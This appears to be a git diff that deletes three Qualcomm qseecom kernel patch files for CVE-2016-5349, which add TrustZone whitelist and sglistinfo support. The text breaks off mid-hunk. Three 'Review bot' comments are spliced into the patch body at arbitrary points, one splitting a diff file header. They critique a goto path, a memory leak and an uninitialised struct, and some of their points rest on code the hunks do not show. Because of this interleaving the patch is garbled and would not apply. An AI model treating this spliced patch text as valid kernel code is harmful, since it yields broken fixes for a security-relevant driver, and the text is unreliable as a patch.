-+ desc.args[4] = req_64bit->resp_len;
-+ desc.args[5] = req_64bit->sglistinfo_ptr;
-+ desc.args[6] = req_64bit->sglistinfo_len;
-+ }
-+ ret = scm_call2(smc_id, &desc);
-+ break;
-+ }
- case QSEOS_TEE_CLOSE_SESSION: {
- struct qseecom_qteec_ireq *req;
- struct qseecom_qteec_64bit_ireq *req_64bit;
-@@ -2490,8 +2609,8 @@ static int __qseecom_send_cmd(struct qseecom_dev_handle *data,
- {
- int ret = 0;
- u32 reqd_len_sb_in = 0;
-- struct qseecom_client_send_data_ireq send_data_req;
-- struct qseecom_client_send_data_64bit_ireq send_data_req_64bit;
-+ struct qseecom_client_send_data_ireq send_data_req = {0};
-+ struct qseecom_client_send_data_64bit_ireq send_data_req_64bit = {0};
- struct qseecom_command_scm_resp resp;
- unsigned long flags;
- struct qseecom_registered_app_list *ptr_app;
-@@ -2499,6 +2618,7 @@ static int __qseecom_send_cmd(struct qseecom_dev_handle *data,
- int name_len = 0;
- void *cmd_buf = NULL;
- size_t cmd_len;
-+ struct sglist_info *table = data->sglistinfo_ptr;
-
- reqd_len_sb_in = req->cmd_req_len + req->resp_len;
- /* find app_id & img_name from list */
-@@ -2523,7 +2643,6 @@ static int __qseecom_send_cmd(struct qseecom_dev_handle *data,
- }
-
- if (qseecom.qsee_version < QSEE_VERSION_40) {
-- send_data_req.qsee_cmd_id = QSEOS_CLIENT_SEND_DATA_COMMAND;
- send_data_req.app_id = data->client.app_id;
- send_data_req.req_ptr = (uint32_t)(__qseecom_uvirt_to_kphys(
- data, (uintptr_t)req->cmd_req_buf));
-@@ -2531,11 +2650,14 @@ static int __qseecom_send_cmd(struct qseecom_dev_handle *data,
- send_data_req.rsp_ptr = (uint32_t)(__qseecom_uvirt_to_kphys(
- data, (uintptr_t)req->resp_buf));
- send_data_req.rsp_len = req->resp_len;
-+ send_data_req.sglistinfo_ptr =
-+ (uint32_t)virt_to_phys(table);
-+ send_data_req.sglistinfo_len = SGLISTINFO_TABLE_SIZE;
-+ dmac_flush_range((void *)table,
-+ (void *)table + SGLISTINFO_TABLE_SIZE);
- cmd_buf = (void *)&send_data_req;
- cmd_len = sizeof(struct qseecom_client_send_data_ireq);
- } else {
-- send_data_req_64bit.qsee_cmd_id =
-- QSEOS_CLIENT_SEND_DATA_COMMAND;
- send_data_req_64bit.app_id = data->client.app_id;
- send_data_req_64bit.req_ptr = __qseecom_uvirt_to_kphys(data,
- (uintptr_t)req->cmd_req_buf);
-@@ -2557,10 +2679,20 @@ static int __qseecom_send_cmd(struct qseecom_dev_handle *data,
- send_data_req_64bit.rsp_len);
- return -EFAULT;
- }
-+ send_data_req_64bit.sglistinfo_ptr =
-+ (uint64_t)virt_to_phys(table);
-+ send_data_req_64bit.sglistinfo_len = SGLISTINFO_TABLE_SIZE;
-+ dmac_flush_range((void *)table,
-+ (void *)table + SGLISTINFO_TABLE_SIZE);
- cmd_buf = (void *)&send_data_req_64bit;
- cmd_len = sizeof(struct qseecom_client_send_data_64bit_ireq);
- }
-
-+ if (qseecom.whitelist_support == false)
-+ *(uint32_t *)cmd_buf = QSEOS_CLIENT_SEND_DATA_COMMAND;
-+ else
-+ *(uint32_t *)cmd_buf = QSEOS_CLIENT_SEND_DATA_COMMAND_WHITELIST;
-+
- msm_ion_do_cache_op(qseecom.ion_clnt, data->client.ihandle,
- data->client.sb_virt,
- reqd_len_sb_in,
-@@ -2814,14 +2946,26 @@ static int __qseecom_update_cmd_buf(void *msg, bool cleanup,
- goto err;
- }
- }
-- if (cleanup)
-+
-+ if (cleanup) {
- msm_ion_do_cache_op(qseecom.ion_clnt,
- ihandle, NULL, len,
- ION_IOC_INV_CACHES);
-- else
-+ } else {
- msm_ion_do_cache_op(qseecom.ion_clnt,
- ihandle, NULL, len,
- ION_IOC_CLEAN_INV_CACHES);
-+ if 
(data->type == QSEECOM_CLIENT_APP) { -+ data->sglistinfo_ptr[i].indexAndFlags = -+ SGLISTINFO_SET_INDEX_FLAG( -+ (sg_ptr->nents == 1), 0, -+ req->ifd_data[i].cmd_buf_offset); -+ data->sglistinfo_ptr[i].sizeOrCount = -+ (sg_ptr->nents == 1) ? -+ sg->length : sg_ptr->nents; -+ data->sglist_cnt = i + 1; -+ } -+ } - /* Deallocate the handle */ - if (!IS_ERR_OR_NULL(ihandle)) - ion_free(qseecom.ion_clnt, ihandle); -@@ -2904,7 +3048,8 @@ static int __qseecom_update_cmd_buf_64(void *msg, bool cleanup, - pr_err("Num of scattered entries"); - pr_err(" (%d) is greater than max supported %d\n", - sg_ptr->nents, QSEECOM_MAX_SG_ENTRY); -- goto err; -+ sg = sg_ptr->sgl; -+ goto cleanup; - } - sg = sg_ptr->sgl; - if (sg_ptr->nents == 1) { -@@ -2956,14 +3101,26 @@ static int __qseecom_update_cmd_buf_64(void *msg, bool cleanup, - sg = sg_next(sg); - } - } -- if (cleanup) -+cleanup: -+ if (cleanup) { - msm_ion_do_cache_op(qseecom.ion_clnt, - ihandle, NULL, len, - ION_IOC_INV_CACHES); -- else -+ } else { - msm_ion_do_cache_op(qseecom.ion_clnt, - ihandle, NULL, len, - ION_IOC_CLEAN_INV_CACHES); -+ if (data->type == QSEECOM_CLIENT_APP) { -+ data->sglistinfo_ptr[i].indexAndFlags = -+ SGLISTINFO_SET_INDEX_FLAG( -+ (sg_ptr->nents == 1), 1, -+ req->ifd_data[i].cmd_buf_offset); -+ data->sglistinfo_ptr[i].sizeOrCount = -+ (sg_ptr->nents == 1) ? 
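Review bot: In `__qseecom_update_cmd_buf_64` the oversized-list branch (`sg_ptr->nents` greater than `QSEECOM_MAX_SG_ENTRY`) now jumps to `cleanup` instead of `err`, so the request is accepted without checking `qseecom.whitelist_support`. The jump skips the code that rewrites the command buffer (outside the hunk, so this is inferred), so on firmware without whitelist support the field at `cmd_buf_offset` would reach TZ as the caller supplied it and the sglistinfo entry would not be consulted. Keeping the old failure for the legacy case preserves the previous behaviour: `if (!qseecom.whitelist_support) goto err;` placed before `sg = sg_ptr->sgl;`. The function starts and ends outside both hunks that touch it.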
-+ sg->length : sg_ptr->nents; -+ data->sglist_cnt = i + 1; -+ } -+ } - /* Deallocate the handle */ - if (!IS_ERR_OR_NULL(ihandle)) - ion_free(qseecom.ion_clnt, ihandle); -@@ -5544,14 +5701,23 @@ static int __qseecom_update_qteec_req_buf(struct qseecom_qteec_modfd_req *req, - *update = (uint32_t)sg_dma_address(sg_ptr->sgl); - } - clean: -- if (cleanup) -+ if (cleanup) { - msm_ion_do_cache_op(qseecom.ion_clnt, - ihandle, NULL, sg->length, - ION_IOC_INV_CACHES); -- else -+ } else { - msm_ion_do_cache_op(qseecom.ion_clnt, - ihandle, NULL, sg->length, - ION_IOC_CLEAN_INV_CACHES); -+ data->sglistinfo_ptr[i].indexAndFlags = -+ SGLISTINFO_SET_INDEX_FLAG( -+ (sg_ptr->nents == 1), 0, -+ req->ifd_data[i].cmd_buf_offset); -+ data->sglistinfo_ptr[i].sizeOrCount = -+ (sg_ptr->nents == 1) ? -+ sg->length : sg_ptr->nents; -+ data->sglist_cnt = i + 1; -+ } - /* Deallocate the handle */ - if (!IS_ERR_OR_NULL(ihandle)) - ion_free(qseecom.ion_clnt, ihandle); -@@ -5576,6 +5742,7 @@ static int __qseecom_qteec_issue_cmd(struct qseecom_dev_handle *data, - uint32_t reqd_len_sb_in = 0; - void *cmd_buf = NULL; - size_t cmd_len; -+ struct sglist_info *table = data->sglistinfo_ptr; - - ret = __qseecom_qteec_validate_msg(data, req); - if (ret) -@@ -5600,8 +5767,15 @@ static int __qseecom_qteec_issue_cmd(struct qseecom_dev_handle *data, - return -ENOENT; - } - -+ if ((cmd_id == QSEOS_TEE_OPEN_SESSION) || -+ (cmd_id == QSEOS_TEE_REQUEST_CANCELLATION)) { -+ ret = __qseecom_update_qteec_req_buf( -+ (struct qseecom_qteec_modfd_req *)req, data, false); -+ if (ret) -+ return ret; -+ } -+ - if (qseecom.qsee_version < QSEE_VERSION_40) { -- ireq.qsee_cmd_id = cmd_id; - ireq.app_id = data->client.app_id; - ireq.req_ptr = (uint32_t)__qseecom_uvirt_to_kphys(data, - (uintptr_t)req->req_ptr); -@@ -5609,10 +5783,13 @@ static int __qseecom_qteec_issue_cmd(struct qseecom_dev_handle *data, - ireq.resp_ptr = (uint32_t)__qseecom_uvirt_to_kphys(data, - (uintptr_t)req->resp_ptr); - ireq.resp_len = req->resp_len; -+ 
ireq.sglistinfo_ptr = (uint32_t)virt_to_phys(table); -+ ireq.sglistinfo_len = SGLISTINFO_TABLE_SIZE; -+ dmac_flush_range((void *)table, -+ (void *)table + SGLISTINFO_TABLE_SIZE); - cmd_buf = (void *)&ireq; - cmd_len = sizeof(struct qseecom_qteec_ireq); - } else { -- ireq_64bit.qsee_cmd_id = cmd_id; - ireq_64bit.app_id = data->client.app_id; - ireq_64bit.req_ptr = (uint64_t)__qseecom_uvirt_to_kphys(data, - (uintptr_t)req->req_ptr); -@@ -5632,17 +5809,19 @@ static int __qseecom_qteec_issue_cmd(struct qseecom_dev_handle *data, - ireq_64bit.resp_ptr, ireq_64bit.resp_len); - return -EFAULT; - } -+ ireq_64bit.sglistinfo_ptr = (uint64_t)virt_to_phys(table); -+ ireq_64bit.sglistinfo_len = SGLISTINFO_TABLE_SIZE; -+ dmac_flush_range((void *)table, -+ (void *)table + SGLISTINFO_TABLE_SIZE); - cmd_buf = (void *)&ireq_64bit; - cmd_len = sizeof(struct qseecom_qteec_64bit_ireq); - } -+ if (qseecom.whitelist_support == true -+ && cmd_id == QSEOS_TEE_OPEN_SESSION) -+ *(uint32_t *)cmd_buf = QSEOS_TEE_OPEN_SESSION_WHITELIST; -+ else -+ *(uint32_t *)cmd_buf = cmd_id; - -- if ((cmd_id == QSEOS_TEE_OPEN_SESSION) || -- (cmd_id == QSEOS_TEE_REQUEST_CANCELLATION)) { -- ret = __qseecom_update_qteec_req_buf( -- (struct qseecom_qteec_modfd_req *)req, data, false); -- if (ret) -- return ret; -- } - reqd_len_sb_in = req->req_len + req->resp_len; - msm_ion_do_cache_op(qseecom.ion_clnt, data->client.ihandle, - data->client.sb_virt, -@@ -5740,6 +5919,9 @@ static int qseecom_qteec_invoke_modfd_cmd(struct qseecom_dev_handle *data, - uint32_t reqd_len_sb_in = 0; - void *cmd_buf = NULL; - size_t cmd_len; -+ struct sglist_info *table = data->sglistinfo_ptr; -+ void *req_ptr = NULL; -+ void *resp_ptr = NULL; - - ret = copy_from_user(&req, argp, - sizeof(struct qseecom_qteec_modfd_req)); -@@ -5751,6 +5933,8 @@ static int qseecom_qteec_invoke_modfd_cmd(struct qseecom_dev_handle *data, - (struct qseecom_qteec_req *)(&req)); - if (ret) - return ret; -+ req_ptr = req.req_ptr; -+ resp_ptr = req.resp_ptr; - - 
/* find app_id & img_name from list */ - spin_lock_irqsave(&qseecom.registered_app_list_lock, flags); -@@ -5771,45 +5955,56 @@ static int qseecom_qteec_invoke_modfd_cmd(struct qseecom_dev_handle *data, - return -ENOENT; - } - -+ /* validate offsets */ -+ for (i = 0; i < MAX_ION_FD; i++) { -+ if (req.ifd_data[i].fd) { -+ if (req.ifd_data[i].cmd_buf_offset >= req.req_len) -+ return -EINVAL; -+ } -+ } -+ req.req_ptr = (void *)__qseecom_uvirt_to_kvirt(data, -+ (uintptr_t)req.req_ptr); -+ req.resp_ptr = (void *)__qseecom_uvirt_to_kvirt(data, -+ (uintptr_t)req.resp_ptr); -+ ret = __qseecom_update_qteec_req_buf(&req, data, false); -+ if (ret) -+ return ret; -+ - if (qseecom.qsee_version < QSEE_VERSION_40) { -- ireq.qsee_cmd_id = QSEOS_TEE_INVOKE_COMMAND; - ireq.app_id = data->client.app_id; - ireq.req_ptr = (uint32_t)__qseecom_uvirt_to_kphys(data, -- (uintptr_t)req.req_ptr); -+ (uintptr_t)req_ptr); - ireq.req_len = req.req_len; - ireq.resp_ptr = (uint32_t)__qseecom_uvirt_to_kphys(data, -- (uintptr_t)req.resp_ptr); -+ (uintptr_t)resp_ptr); - ireq.resp_len = req.resp_len; - cmd_buf = (void *)&ireq; - cmd_len = sizeof(struct qseecom_qteec_ireq); -+ ireq.sglistinfo_ptr = (uint32_t)virt_to_phys(table); -+ ireq.sglistinfo_len = SGLISTINFO_TABLE_SIZE; -+ dmac_flush_range((void *)table, -+ (void *)table + SGLISTINFO_TABLE_SIZE); - } else { -- ireq_64bit.qsee_cmd_id = QSEOS_TEE_INVOKE_COMMAND; - ireq_64bit.app_id = data->client.app_id; - ireq_64bit.req_ptr = (uint64_t)__qseecom_uvirt_to_kphys(data, -- (uintptr_t)req.req_ptr); -+ (uintptr_t)req_ptr); - ireq_64bit.req_len = req.req_len; - ireq_64bit.resp_ptr = (uint64_t)__qseecom_uvirt_to_kphys(data, -- (uintptr_t)req.resp_ptr); -+ (uintptr_t)resp_ptr); - ireq_64bit.resp_len = req.resp_len; - cmd_buf = (void *)&ireq_64bit; - cmd_len = sizeof(struct qseecom_qteec_64bit_ireq); -+ ireq_64bit.sglistinfo_ptr = (uint64_t)virt_to_phys(table); -+ ireq_64bit.sglistinfo_len = SGLISTINFO_TABLE_SIZE; -+ dmac_flush_range((void *)table, -+ (void 
*)table + SGLISTINFO_TABLE_SIZE); - } - reqd_len_sb_in = req.req_len + req.resp_len; -+ if (qseecom.whitelist_support == true) -+ *(uint32_t *)cmd_buf = QSEOS_TEE_INVOKE_COMMAND_WHITELIST; -+ else -+ *(uint32_t *)cmd_buf = QSEOS_TEE_INVOKE_COMMAND; - -- /* validate offsets */ -- for (i = 0; i < MAX_ION_FD; i++) { -- if (req.ifd_data[i].fd) { -- if (req.ifd_data[i].cmd_buf_offset >= req.req_len) -- return -EINVAL; -- } -- } -- req.req_ptr = (void *)__qseecom_uvirt_to_kvirt(data, -- (uintptr_t)req.req_ptr); -- req.resp_ptr = (void *)__qseecom_uvirt_to_kvirt(data, -- (uintptr_t)req.resp_ptr); -- ret = __qseecom_update_qteec_req_buf(&req, data, false); -- if (ret) -- return ret; - msm_ion_do_cache_op(qseecom.ion_clnt, data->client.ihandle, - data->client.sb_virt, - reqd_len_sb_in, -@@ -5872,6 +6067,15 @@ static int qseecom_qteec_request_cancellation(struct qseecom_dev_handle *data, - return ret; - } - -+static void __qseecom_clean_data_sglistinfo(struct qseecom_dev_handle *data) -+{ -+ if (data->sglist_cnt) { -+ memset(data->sglistinfo_ptr, 0, -+ SGLISTINFO_TABLE_SIZE); -+ data->sglist_cnt = 0; -+ } -+} -+ - long qseecom_ioctl(struct file *file, unsigned cmd, unsigned long arg) - { - int ret = 0; -@@ -6047,6 +6251,7 @@ long qseecom_ioctl(struct file *file, unsigned cmd, unsigned long arg) - mutex_unlock(&app_access_lock); - if (ret) - pr_err("failed qseecom_send_cmd: %d\n", ret); -+ __qseecom_clean_data_sglistinfo(data); - break; - } - case QSEECOM_IOCTL_RECEIVE_REQ: { -@@ -6439,6 +6644,7 @@ long qseecom_ioctl(struct file *file, unsigned cmd, unsigned long arg) - mutex_unlock(&app_access_lock); - if (ret) - pr_err("failed open_session_cmd: %d\n", ret); -+ __qseecom_clean_data_sglistinfo(data); - break; - } - case QSEECOM_QTEEC_IOCTL_CLOSE_SESSION_REQ: { -@@ -6487,6 +6693,7 @@ long qseecom_ioctl(struct file *file, unsigned cmd, unsigned long arg) - mutex_unlock(&app_access_lock); - if (ret) - pr_err("failed Invoke cmd: %d\n", ret); -+ 
__qseecom_clean_data_sglistinfo(data); - break; - } - case QSEECOM_QTEEC_IOCTL_REQUEST_CANCELLATION_REQ: { -@@ -6539,6 +6746,9 @@ static int qseecom_open(struct inode *inode, struct file *file) - init_waitqueue_head(&data->abort_wq); - atomic_set(&data->ioctl_count, 0); - -+ data->sglistinfo_ptr = kzalloc(SGLISTINFO_TABLE_SIZE, GFP_KERNEL); -+ if (!(data->sglistinfo_ptr)) -+ return -ENOMEM; - return ret; - } - -@@ -6591,6 +6801,7 @@ static int qseecom_release(struct inode *inode, struct file *file) - if (data->perf_enabled == true) - qsee_disable_clock_vote(data, CLK_DFAB); - } -+ kfree(data->sglistinfo_ptr); - kfree(data); - - return ret; -@@ -6731,6 +6942,74 @@ static void __qseecom_deinit_clk(enum qseecom_ce_hw_instance ce) - qclk->instance = CLK_INVALID; - } - -+/* -+ * Check if whitelist feature is supported by making a test scm_call -+ * to send a whitelist command to an invalid app ID 0 -+ */ -+static int qseecom_check_whitelist_feature(void) -+{ -+ struct qseecom_client_send_data_ireq send_data_req = {0}; -+ struct qseecom_client_send_data_64bit_ireq send_data_req_64bit = {0}; -+ struct qseecom_command_scm_resp resp; -+ uint32_t buf_size = 128; -+ void *buf = NULL; -+ void *cmd_buf = NULL; -+ size_t cmd_len; -+ int ret = 0; -+ phys_addr_t pa; -+ -+ buf = kzalloc(buf_size, GFP_KERNEL); -+ if (!buf) -+ return -ENOMEM; -+ pa = virt_to_phys(buf); -+ if (qseecom.qsee_version < QSEE_VERSION_40) { -+ send_data_req.qsee_cmd_id = -+ QSEOS_CLIENT_SEND_DATA_COMMAND_WHITELIST; -+ send_data_req.app_id = 0; -+ send_data_req.req_ptr = (uint32_t)pa; -+ send_data_req.req_len = buf_size; -+ send_data_req.rsp_ptr = (uint32_t)pa; -+ send_data_req.rsp_len = buf_size; -+ send_data_req.sglistinfo_ptr = (uint32_t)pa; -+ send_data_req.sglistinfo_len = buf_size; -+ cmd_buf = (void *)&send_data_req; -+ cmd_len = sizeof(struct qseecom_client_send_data_ireq); -+ } else { -+ send_data_req_64bit.qsee_cmd_id = -+ QSEOS_CLIENT_SEND_DATA_COMMAND_WHITELIST; -+ send_data_req_64bit.app_id = 0; 
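Review bot: The new allocation-failure path in `qseecom_open` returns `-ENOMEM` without releasing `data`, which the context lines just above show is already set up at this point, so every failed open leaks the handle. The branch should free it first: `if (!(data->sglistinfo_ptr)) { kzfree(data); return -ENOMEM; }`. Patch 0003 further down this page adds exactly that, so anyone backporting 0001 on its own needs to carry both. Where `data` is allocated is outside the hunk.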
-+ send_data_req_64bit.req_ptr = (uint64_t)pa; -+ send_data_req_64bit.req_len = buf_size; -+ send_data_req_64bit.rsp_ptr = (uint64_t)pa; -+ send_data_req_64bit.rsp_len = buf_size; -+ send_data_req_64bit.sglistinfo_ptr = (uint64_t)pa; -+ send_data_req_64bit.sglistinfo_len = buf_size; -+ cmd_buf = (void *)&send_data_req_64bit; -+ cmd_len = sizeof(struct qseecom_client_send_data_64bit_ireq); -+ } -+ ret = qseecom_scm_call(SCM_SVC_TZSCHEDULER, 1, -+ cmd_buf, cmd_len, -+ &resp, sizeof(resp)); -+/* -+ * If this cmd exists and whitelist is supported, scm_call return -2 (scm -+ * driver remap it to -EINVAL) and resp.result 0xFFFFFFED(-19); Otherwise, -+ * scm_call return -1 (remap to -EIO). -+ */ -+ if (ret == -EIO) { -+ qseecom.whitelist_support = false; -+ ret = 0; -+ } else if (ret == -EINVAL && -+ resp.result == QSEOS_RESULT_FAIL_SEND_CMD_NO_THREAD) { -+ qseecom.whitelist_support = true; -+ ret = 0; -+ } else { -+ pr_err("Failed to check whitelist: ret = %d, result = 0x%x\n", -+ ret, resp.result); -+ } -+ kfree(buf); -+ return ret; -+} -+ - static int qseecom_probe(struct platform_device *pdev) - { - int rc; -@@ -6762,6 +7041,7 @@ static int qseecom_probe(struct platform_device *pdev) - - qseecom.app_block_ref_cnt = 0; - init_waitqueue_head(&qseecom.app_block_wq); -+ qseecom.whitelist_support = true; - - rc = alloc_chrdev_region(&qseecom_device_no, 0, 1, QSEECOM_DEV); - if (rc < 0) { -@@ -7056,6 +7336,14 @@ static int qseecom_probe(struct platform_device *pdev) - qseecom.qsee_perf_client = msm_bus_scale_register_client( - qseecom_platform_support); - -+ rc = qseecom_check_whitelist_feature(); -+ if (rc) { -+ rc = -EINVAL; -+ goto exit_destroy_ion_client; -+ } -+ pr_warn("qseecom.whitelist_support = %d\n", -+ qseecom.whitelist_support); -+ - if (!qseecom.qsee_perf_client) - pr_err("Unable to register bus client\n"); - return 0; -diff --git a/include/soc/qcom/qseecomi.h b/include/soc/qcom/qseecomi.h -index ad135e8..50b10f9 100644 ---- a/include/soc/qcom/qseecomi.h -+++ 
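Review bot: `resp` in `qseecom_check_whitelist_feature` is declared without an initialiser, yet `resp.result` is compared in the `-EINVAL` branch and printed by `pr_err` in the final `else`, and both run only after the call has returned an error. Whether `qseecom_scm_call` fills `resp` on failure is not visible here, so those reads may see uninitialised stack contents. That could misclassify the feature and could put stack data into the kernel log. Initialise it like the two request structs declared beside it: `struct qseecom_command_scm_resp resp = {0};`.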
b/include/soc/qcom/qseecomi.h -@@ -1,5 +1,5 @@ - /* -- * Copyright (c) 2013-2015, The Linux Foundation. All rights reserved. -+ * Copyright (c) 2013-2016, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -18,6 +18,7 @@ - - #define QSEECOM_KEY_ID_SIZE 32 - -+#define QSEOS_RESULT_FAIL_SEND_CMD_NO_THREAD -19 /*0xFFFFFFED*/ - #define QSEOS_RESULT_FAIL_UNSUPPORTED_CE_PIPE -63 - #define QSEOS_RESULT_FAIL_KS_OP -64 - #define QSEOS_RESULT_FAIL_KEY_ID_EXISTS -65 -@@ -74,6 +75,9 @@ enum qseecom_qceos_cmd_id { - QSEOS_FSM_IKE_CMD_SIGN = 0x200, - QSEOS_FSM_IKE_CMD_PROV_KEY = 0x201, - QSEOS_FSM_IKE_CMD_ENCRYPT_PRIVATE_KEY = 0x202, -+ QSEOS_CLIENT_SEND_DATA_COMMAND_WHITELIST = 0x1C, -+ QSEOS_TEE_OPEN_SESSION_WHITELIST = 0x1D, -+ QSEOS_TEE_INVOKE_COMMAND_WHITELIST = 0x1E, - QSEOS_FSM_OEM_FUSE_WRITE_ROW = 0x301, - QSEOS_FSM_OEM_FUSE_READ_ROW = 0x302, - QSEOS_CMD_MAX = 0xEFFFFFFF -@@ -175,6 +179,8 @@ __packed struct qseecom_client_send_data_ireq { - uint32_t req_len; - uint32_t rsp_ptr;/* First 4 bytes should be the return status */ - uint32_t rsp_len; -+ uint32_t sglistinfo_ptr; -+ uint32_t sglistinfo_len; - }; - - __packed struct qseecom_client_send_data_64bit_ireq { -@@ -184,6 +190,8 @@ __packed struct qseecom_client_send_data_64bit_ireq { - uint32_t req_len; - uint64_t rsp_ptr; - uint32_t rsp_len; -+ uint64_t sglistinfo_ptr; -+ uint32_t sglistinfo_len; - }; - - __packed struct qseecom_reg_log_buf_ireq { -@@ -286,6 +294,8 @@ __packed struct qseecom_qteec_ireq { - uint32_t req_len; - uint32_t resp_ptr; - uint32_t resp_len; -+ uint32_t sglistinfo_ptr; -+ uint32_t sglistinfo_len; - }; - - __packed struct qseecom_qteec_64bit_ireq { -@@ -295,6 +305,8 @@ __packed struct qseecom_qteec_64bit_ireq { - uint32_t req_len; - uint64_t resp_ptr; - uint32_t resp_len; -+ uint64_t sglistinfo_ptr; -+ uint32_t sglistinfo_len; - }; - - __packed struct 
qseecom_client_send_fsm_key_req { -@@ -634,4 +646,37 @@ __packed struct qseecom_client_send_fsm_key_req { - #define TZ_OS_CONTINUE_BLOCKED_REQUEST_ID_PARAM_ID \ - TZ_SYSCALL_CREATE_PARAM_ID_1(TZ_SYSCALL_PARAM_TYPE_VAL) - -+#define TZ_APP_QSAPP_SEND_DATA_WITH_WHITELIST_ID \ -+ TZ_SYSCALL_CREATE_SMC_ID(TZ_OWNER_TZ_APPS, \ -+ TZ_SVC_APP_ID_PLACEHOLDER, 0x06) -+ -+#define TZ_APP_QSAPP_SEND_DATA_WITH_WHITELIST_ID_PARAM_ID \ -+ TZ_SYSCALL_CREATE_PARAM_ID_7( \ -+ TZ_SYSCALL_PARAM_TYPE_VAL, TZ_SYSCALL_PARAM_TYPE_BUF_RW, \ -+ TZ_SYSCALL_PARAM_TYPE_VAL, TZ_SYSCALL_PARAM_TYPE_BUF_RW, \ -+ TZ_SYSCALL_PARAM_TYPE_VAL, TZ_SYSCALL_PARAM_TYPE_BUF_RW, \ -+ TZ_SYSCALL_PARAM_TYPE_VAL) -+ -+#define TZ_APP_GPAPP_OPEN_SESSION_WITH_WHITELIST_ID \ -+ TZ_SYSCALL_CREATE_SMC_ID(TZ_OWNER_TZ_APPS, \ -+ TZ_SVC_APP_ID_PLACEHOLDER, 0x07) -+ -+#define TZ_APP_GPAPP_OPEN_SESSION_WITH_WHITELIST_ID_PARAM_ID \ -+ TZ_SYSCALL_CREATE_PARAM_ID_7( \ -+ TZ_SYSCALL_PARAM_TYPE_VAL, TZ_SYSCALL_PARAM_TYPE_BUF_RW, \ -+ TZ_SYSCALL_PARAM_TYPE_VAL, TZ_SYSCALL_PARAM_TYPE_BUF_RW, \ -+ TZ_SYSCALL_PARAM_TYPE_VAL, TZ_SYSCALL_PARAM_TYPE_BUF_RW, \ -+ TZ_SYSCALL_PARAM_TYPE_VAL) -+ -+#define TZ_APP_GPAPP_INVOKE_COMMAND_WITH_WHITELIST_ID \ -+ TZ_SYSCALL_CREATE_SMC_ID(TZ_OWNER_TZ_APPS, \ -+ TZ_SVC_APP_ID_PLACEHOLDER, 0x09) -+ -+#define TZ_APP_GPAPP_INVOKE_COMMAND_WITH_WHITELIST_ID_PARAM_ID \ -+ TZ_SYSCALL_CREATE_PARAM_ID_7( \ -+ TZ_SYSCALL_PARAM_TYPE_VAL, TZ_SYSCALL_PARAM_TYPE_BUF_RW, \ -+ TZ_SYSCALL_PARAM_TYPE_VAL, TZ_SYSCALL_PARAM_TYPE_BUF_RW, \ -+ TZ_SYSCALL_PARAM_TYPE_VAL, TZ_SYSCALL_PARAM_TYPE_BUF_RW, \ -+ TZ_SYSCALL_PARAM_TYPE_VAL) -+ - #endif /* __QSEECOMI_H_ */ --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-5349/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-5349/ANY/0002.patch deleted file mode 100644 index 052f085f..00000000 --- a/Patches/Linux_CVEs/CVE-2016-5349/ANY/0002.patch +++ /dev/null 
@@ -1,61 +0,0 @@ -From 03853a58952834ac3e1e3007c9c680dd4c001a2f Mon Sep 17 00:00:00 2001 -From: Zhen Kong -Date: Thu, 1 Sep 2016 10:20:50 -0700 -Subject: qseecom: allocate sglistinfo buffer for kernel clients - -To support whitelist feature, sglistinfo table should also -be allocated from qseecom kernel APIs used by kernel client. -Besides, initialize sg in __qseecom_update_cmd_buf_64 to -address a static analysis warning. - -Change-Id: I1f1967fd9e95444cca728f09e3e8f4914b2abb95 -Signed-off-by: Zhen Kong ---- - drivers/misc/qseecom.c | 11 +++++++++++ - 1 file changed, 11 insertions(+) - -diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c -index aa7c8ad..59545f4 100644 ---- a/drivers/misc/qseecom.c -+++ b/drivers/misc/qseecom.c -@@ -3845,12 +3845,21 @@ int qseecom_start_app(struct qseecom_handle **handle, - data->client.user_virt_sb_base = 0; - data->client.ihandle = NULL; - -+ /* Allocate sglistinfo buffer for kernel client */ -+ data->sglistinfo_ptr = kzalloc(SGLISTINFO_TABLE_SIZE, GFP_KERNEL); -+ if (!(data->sglistinfo_ptr)) { -+ kfree(data); -+ kfree(*handle); -+ *handle = NULL; -+ return -ENOMEM; -+ } - init_waitqueue_head(&data->abort_wq); - - data->client.ihandle = ion_alloc(qseecom.ion_clnt, size, 4096, - ION_HEAP(ION_QSECOM_HEAP_ID), 0); - if (IS_ERR_OR_NULL(data->client.ihandle)) { - pr_err("Ion client could not retrieve the handle\n"); -+ kfree(data->sglistinfo_ptr); - kfree(data); - kfree(*handle); - *handle = NULL; -@@ -3948,6 +3957,7 @@ int qseecom_start_app(struct qseecom_handle **handle, - return 0; - - err: -+ kfree(data->sglistinfo_ptr); - kfree(data); - kfree(*handle); - *handle = NULL; -@@ -3989,6 +3999,7 @@ int qseecom_shutdown_app(struct qseecom_handle **handle) - - mutex_unlock(&app_access_lock); - if (ret == 0) { -+ kzfree(data->sglistinfo_ptr); - kzfree(data); - kzfree(*handle); - kzfree(kclient); --- -cgit v1.1 - 
diff --git a/Patches/Linux_CVEs/CVE-2016-5349/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2016-5349/ANY/0003.patch deleted file mode 100644 index 094b7177..00000000 --- a/Patches/Linux_CVEs/CVE-2016-5349/ANY/0003.patch +++ /dev/null @@ -1,47 +0,0 @@ -From e3d969000fb60ecb9bc01667fa89957f67763514 Mon Sep 17 00:00:00 2001 -From: Zhen Kong -Date: Wed, 7 Sep 2016 16:22:11 +0530 -Subject: qseecom: Change whitelist_support flag to false if TZ failed to check - -The whitelist status is set default as true though TZ failed to check, -which in turn causing the send_command fail by passing whitelist commnd id. -So updating the support status flag to false when TZ fails to check. - -Change-Id: I78a7600506b4d2457bb1c38f8a39888a9cf9467c -Signed-off-by: Mallikarjuna Reddy Amireddy -Signed-off-by: Zhen Kong ---- - drivers/misc/qseecom.c | 8 ++++++-- - 1 file changed, 6 insertions(+), 2 deletions(-) - -diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c -index 543eff3..a0d27d6 100644 ---- a/drivers/misc/qseecom.c -+++ b/drivers/misc/qseecom.c -@@ -6838,8 +6838,10 @@ static int qseecom_open(struct inode *inode, struct file *file) - atomic_set(&data->ioctl_count, 0); - - data->sglistinfo_ptr = kzalloc(SGLISTINFO_TABLE_SIZE, GFP_KERNEL); -- if (!(data->sglistinfo_ptr)) -+ if (!(data->sglistinfo_ptr)) { -+ kzfree(data); - return -ENOMEM; -+ } - return ret; - } - -@@ -7096,8 +7098,10 @@ static int qseecom_check_whitelist_feature(void) - 